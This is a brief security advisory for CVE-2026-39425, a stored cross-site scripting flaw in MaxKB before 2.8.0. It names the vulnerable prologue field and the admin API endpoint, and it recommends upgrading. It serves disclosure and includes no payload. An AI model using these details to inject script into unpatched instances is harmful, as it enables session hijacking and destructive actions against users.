CVE-2026-39425

Name of the Vulnerable Software and Affected Versions MaxKB versions prior to 2.8.0

Description Authenticated users can inject arbitrary HTML and JavaScript into the Application prologue (Opening Remarks) field by wrapping malicious payloads in tags. The backend fails to sanitize or encode HTML entities in the prologue field when applications are created or updated via the '/admin/api/workspace/{workspace id}/application' endpoint, storing the raw payload in the database. The frontend renders this content using an innerHTML-equivalent mechanism, allowing persistent DOM-based Stored Cross-Site Scripting (XSS) execution against any visitor who opens the affected chatbot interface. This can lead to session hijacking, sensitive data exposure, and unauthorized actions such as deleting workspaces or applications.

Recommendations Update to version 2.8.0.